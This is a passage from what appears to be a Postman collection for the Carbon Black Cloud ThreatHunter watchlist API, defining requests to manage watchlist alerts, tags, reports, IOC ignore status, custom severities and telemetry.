Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","watchlists","{{cb_watchlist_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"d8e1599e-ab2c-453c-96e5-758c284963f5"},{"name":"Get Watchlist Alert Status","id":"8ae7bc3f-38ac-47d0-ae15-76052a3b9a3b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/watchlists/{{cb_watchlist_id}}/alert","description":"<p>Retrieve alert status for watchlist with <code>watchlist_id</code>.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#get-watchlist-alert-status\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","watchlists","{{cb_watchlist_id}}","alert"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"8ae7bc3f-38ac-47d0-ae15-76052a3b9a3b"},{"name":"Enable Watchlist Alerts","id":"3714358a-98c0-41ef-a0a0-6aab5bb4002d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/watchlists/{{cb_watchlist_id}}/alert","description":"<p>Turn on alerts for watchlist with <code>watchlist_id</code>. This is not retroactive for existing watchlist hits. Future hits will trigger alerts.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#enable-watchlist-alerts\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","watchlists","{{cb_watchlist_id}}","alert"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"3714358a-98c0-41ef-a0a0-6aab5bb4002d"},{"name":"Disable Watchlist Alerts","id":"776a2f86-dc67-4e5e-92d8-6b0b835511c3","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/watchlists/{{cb_watchlist_id}}/alert","description":"<p>Turn off alerts for watchlist with <code>watchlist_id</code>. This is not retroactive for existing watchlist alerts. Future hits will not trigger alerts.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#disable-watchlist-alerts\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","watchlists","{{cb_watchlist_id}}","alert"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"776a2f86-dc67-4e5e-92d8-6b0b835511c3"},{"name":"Get Watchlist Tag Status","id":"ca235d13-da7e-4279-87d0-dfe6194da76e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/watchlists/{{cb_watchlist_id}}/tag","description":"<p>Retrieve tag status for watchlist with <code>watchlist_id</code>.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#get-watchlist-tag-status\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","watchlists","{{cb_watchlist_id}}","tag"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"ca235d13-da7e-4279-87d0-dfe6194da76e"},{"name":"Enable Watchlist Tags","id":"ab4b93ab-eee0-4bcf-a26a-3dd078144ea7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/watchlists/{{cb_watchlist_id}}/tag","description":"<p>Turn on tagging for watchlist with <code>watchlist_id</code>. This is not retroactive for existing watchlist matches. Future matches will trigger event tagging.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#enable-watchlist-tags\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","watchlists","{{cb_watchlist_id}}","tag"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"ab4b93ab-eee0-4bcf-a26a-3dd078144ea7"},{"name":"Disable Watchlist Tags","id":"8679c3b1-fedb-4664-982e-b4372ccb9428","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/watchlists/{{cb_watchlist_id}}/tag","description":"<p>Turn off tagging for watchlist with <code>watchlist_id</code>. This is not retroactive for existing watchlist tags. Future matches will not trigger event tagging.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#disable-watchlist-tags\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","watchlists","{{cb_watchlist_id}}","tag"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"8679c3b1-fedb-4664-982e-b4372ccb9428"},{"name":"Get Report Ignore Status","id":"59a71973-e3e6-4390-aedb-19bbee1819b0","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/reports/{{cb_report_id}}/ignore","description":"<p>Get current ignore status for report with <code>report_id</code>.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#get-report-ignore-status\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","reports","{{cb_report_id}}","ignore"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"59a71973-e3e6-4390-aedb-19bbee1819b0"},{"name":"Ignore Report","id":"0986b231-f708-458d-8a28-1328ff54a1b5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/reports/{{cb_report_id}}/ignore","description":"<p>Report with <code>report_id</code> and all contained IOCs will not match future events for any watchlist.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#re-activate-report\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","reports","{{cb_report_id}}","ignore"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"0986b231-f708-458d-8a28-1328ff54a1b5"},{"name":"Re-activate Report","id":"f84b3568-9baf-4f4a-9b2c-980e3bc57843","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/reports/{{cb_report_id}}/ignore","description":"<p>Report with <code>report_id</code> and all contained IOCs will match future events for all watchlists. This is not retroactive for events that occured while the report was ignored.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#re-activate-report\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","reports","{{cb_report_id}}","ignore"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"f84b3568-9baf-4f4a-9b2c-980e3bc57843"},{"name":"Get IOC Ignore Status","id":"480da286-bfd7-47e2-8010-41a0f41a5929","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json","type":"text"}],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/reports/{{cb_report_id}}/iocs/{{cb_ioc_id}}/ignore","description":"<p>Get current ignore status for IOC <code>ioc_id</code> in report <code>report_id</code>.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#ignore-ioc\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","reports","{{cb_report_id}}","iocs","{{cb_ioc_id}}","ignore"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"480da286-bfd7-47e2-8010-41a0f41a5929"},{"name":"Ignore IOC","id":"9a1a4d32-761a-465f-8dfc-7f72d67661d1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/reports/{{cb_report_id}}/iocs/{{cb_ioc_id}}/ignore","description":"<p>IOC <code>ioc_id</code> for report <code>report_id</code> will not match future events for any watchlist.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#ignore-ioc\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","reports","{{cb_report_id}}","iocs","{{cb_ioc_id}}","ignore"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"9a1a4d32-761a-465f-8dfc-7f72d67661d1"},{"name":"Re-activate IOC","id":"c7883f60-938e-4a67-b15b-fb0b5cfdf2e1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/reports/{{cb_report_id}}/iocs/{{cb_ioc_id}}/ignore","description":"<p>IOC <code>ioc_id</code> for <code>report report_id</code> and will match future events for all watchlists. This is not retroactive for events that occured while the IOC was ignored.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#re-activate-ioc\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","reports","{{cb_report_id}}","iocs","{{cb_ioc_id}}","ignore"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"c7883f60-938e-4a67-b15b-fb0b5cfdf2e1"},{"name":"Get Custom Report Severities","id":"de91fe50-0d89-4a7f-9ca4-f0830a8da5f1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/reports/severity","description":"<p>Return all custom report severities. Custom report severities effect all watchlists.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#get-custom-report-severities\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","reports","severity"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"de91fe50-0d89-4a7f-9ca4-f0830a8da5f1"},{"name":"Get Custom Severity for Report","id":"2a264ab0-e310-4c93-a395-d43c0ace0439","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/reports/{{cb_report_id}}/severity","description":"<p>Return custom severity for <code>report_id</code>. This will return 404 error if custom severity doesn’t exist.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#get-custom-severity-for-report\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","reports","{{cb_report_id}}","severity"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"2a264ab0-e310-4c93-a395-d43c0ace0439"},{"name":"Set Custom Report Severity","id":"e6c32e4d-e25d-4d97-8868-34dc089a7350","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\"report_id\": str*,\n \"severity\": int*}"},"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/reports/{{cb_report_id}}/severity","description":"<p>Adjust the severity of report with <code>report_id</code>. This will effect all watchlists.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#set-custom-report-severity\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","reports","{{cb_report_id}}","severity"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"e6c32e4d-e25d-4d97-8868-34dc089a7350"},{"name":"Remove Custom Report Severity","id":"90283cec-8124-4d43-96a6-eed23388b088","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/reports/{{cb_report_id}}/severity","description":"<p>Remove custom severity for report with <code>report_id</code>.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#remove-custom-report-severity\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","reports","{{cb_report_id}}","severity"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"90283cec-8124-4d43-96a6-eed23388b088"},{"name":"Create New Report","id":"6a4bc123-15ba-4a4a-ae8c-7288e146d119","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\"id\": str*,\n \"timestamp\": int*,\n \"title\": str*,\n \"description\": str*,\n \"severity\": int*,\n \"link\": str,\n \"tags\": [str],\n \"iocs\": IOCs,\n \"iocs_v2\": [IOC_V2],\n \"visibility\": str}"},"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/reports","description":"<p>Add a new watchlist report. This service will generate a unique report id. This report will be private to the caller. IOCs will be converted to IOC_V2.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#create-new-report\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","reports"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"6a4bc123-15ba-4a4a-ae8c-7288e146d119"},{"name":"Update a Report","id":"3fac3b98-e127-459a-a454-f667c576b392","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\"id\": str*,\n \"timestamp\": int*,\n \"title\": str*,\n \"description\": str*,\n \"severity\": int*,\n \"link\": str,\n \"tags\": [str],\n \"iocs\": IOCs,\n \"iocs_v2\": [IOC_V2],\n \"visibility\": str}"},"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/reports/{{cb_report_id}}","description":"<p>Update report with <code>report_id</code>. This will replace all fields in the report. Any fields not provided in the request will be remove from the report. All IOCs will be converted to IOC_V2. The report must be owned by the caller.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#update-a-report\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","reports","{{cb_report_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"3fac3b98-e127-459a-a454-f667c576b392"},{"name":"Get Report","id":"100d2725-cab3-438d-b5a3-8629f7176b9c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/reports/{{cb_report_id}}","description":"<p>Retrieve report with <code>report_id</code>. The report must be owned by the caller.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#get-report\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","reports","{{cb_report_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"100d2725-cab3-438d-b5a3-8629f7176b9c"},{"name":"Remove Report","id":"6085f2e8-566f-48eb-b5f1-16064b99acd9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/reports/{{cb_report_id}}","description":"<p>Remove report with <code>report_id</code>. The report must be owned by the caller.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#remove-report\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","reports","{{cb_report_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"6085f2e8-566f-48eb-b5f1-16064b99acd9"},{"name":"Get Ignore Status for Provided Report IDs","id":"e3b2be23-1296-4bea-99dc-09442c781996","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/reports/{{cb_report_id}}/ignore/bulk","description":"<p>Get current ignore status for report and embedded IOCs in provided list of comma-separated <code>report_ids</code>. <code>report_ids</code> can be a single id.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#get-ignore-status-for-provided-report-ids\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","reports","{{cb_report_id}}","ignore","bulk"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"e3b2be23-1296-4bea-99dc-09442c781996"},{"name":"Bulk Ignore Report and IOCs","id":"66bddecb-1226-4489-9780-cc6950c8416a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\"ignore\": bool*,\n \"report_id\": str*,\n \"ioc_id\": str}"},"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/reports/ignore/bulk","description":"<p>All reports and IOCs as defined in the <code>ReportIOCIgnore</code> list with ignore=True will not match future events for any watchlist. All items with ignore=False will enable matching on future events. A <code>ReportIOCIgnore</code> that does not define an <code>ioc_id</code> will effect the entire report (all IOCs).</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#bulk-ignore-report-and-iocs\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","reports","ignore","bulk"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"66bddecb-1226-4489-9780-cc6950c8416a"},{"name":"Search (Get) Watchlist Telemetry","id":"e3483356-46a0-4486-ba8d-fc5f4c314a63","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"watchlist_ids\": [\n        \"<string>\"\n    ],\n    \"intervals\": [\n        <integer>\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/watchlists/telemetry","description":"<p>Returns hits and executions for watchlists over the provided intervals. By default will return telemetry aggregated over the past hour. Include the list of watchlist ids to get telemetry data for and a comma separated list of intervals in minutes in the request body to aggregate over different ranges, eg intervals=1440,10080,43200. to aggregate over different ranges, eg intervals=1440,10080,43200.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#get-watchlist-telemetry\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","watchlists","telemetry"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"a340b6bc-d96d-4397-9690-4c0d5b63a0b9","name":"Get Watchlist 